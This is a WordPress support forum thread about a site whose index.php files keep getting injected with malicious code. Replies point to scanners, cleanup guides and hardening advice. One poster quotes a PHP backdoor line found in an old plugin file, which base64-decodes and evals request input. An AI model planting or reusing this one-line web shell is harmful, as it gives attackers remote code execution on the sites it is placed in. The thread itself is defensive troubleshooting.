Javascript code apprearing on index.php - Malware Issue? (4 posts)

  1. Mike Rodriguez
    Posted 4 years ago #

    Hello all, this morning I woke up too a code appearing on my index.php file. The code is below:

    [Code moderated.]

    I went on sucuri.net and used their free scanner to scan my site and i found this (screenshot): http://i42.tinypic.com/34or0wk.png

    what can this possibly be, I changed all my passwords and checked all my .htaccess file and they were all clean.

    Any input would be appreciated. Thanks in Advanced.

  2. tburdeinei
    Posted 4 years ago #

    This is what I did to fix it- Rollback index.php to original and change its server permissions to read-only 555.

  3. MickeyRoush
    Posted 4 years ago #

    There may be no easy solution. I've combined as many links into one post so that you won't have to search the entire web indefinitely. Hopefully they will help you.

    Check your site(s) here:
    1. http://sitecheck.sucuri.net/scanner/
    2. http://www.unmaskparasites.com/
    3. http://www.virustotal.com/
    4. http://www.phishtank.com/
    5. http://www.browserdefender.com/
    6. http://ismyblogworking.com/
    7. Google Safe Browsing (to access a site's google info, add their domain to the end of this):

    Backup everything and put that backup somewhere safe.This is in case you have problems later on. Even though you could be backing up infected files, it is more important to have a backup up of your work, for if you make a mistake cleaning your site, you will still have the backup(s).
    1. http://codex.wordpress.org/WordPress_Backups
    2. http://codex.wordpress.org/Backing_Up_Your_Database
    3. http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Then read these:
    1. http://codex.wordpress.org/FAQ_My_site_was_hacked
    2. http://wordpress.org/support/topic/268083#post-1065779
    3. http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    4. http://ottopress.com/2009/hacked-wordpress-backdoors/

    If you have indications of possible timthumb hacking, please read these:
    1. http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html
    2. http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
    3. http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/
    4. http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

    Once your site is clean, then read this:
    1. http://codex.wordpress.org/Hardening_WordPress
    2. http://codex.wordpress.org/htaccess_for_subdirectories

  4. gal_op
    Posted 4 years ago #

    I have the same issue, all my index.php are keep on being injected with the malicious code.

    I found an old plugin folder that i have uninstalled in the past, the folder is empty except to a file called ToolPack.php and it had a line of code:
    $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;

    I have removed the folder and now i am waiting to see if the malicious code is back.

    I have found out that this is could be the backdoor:

    Will update you soon

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.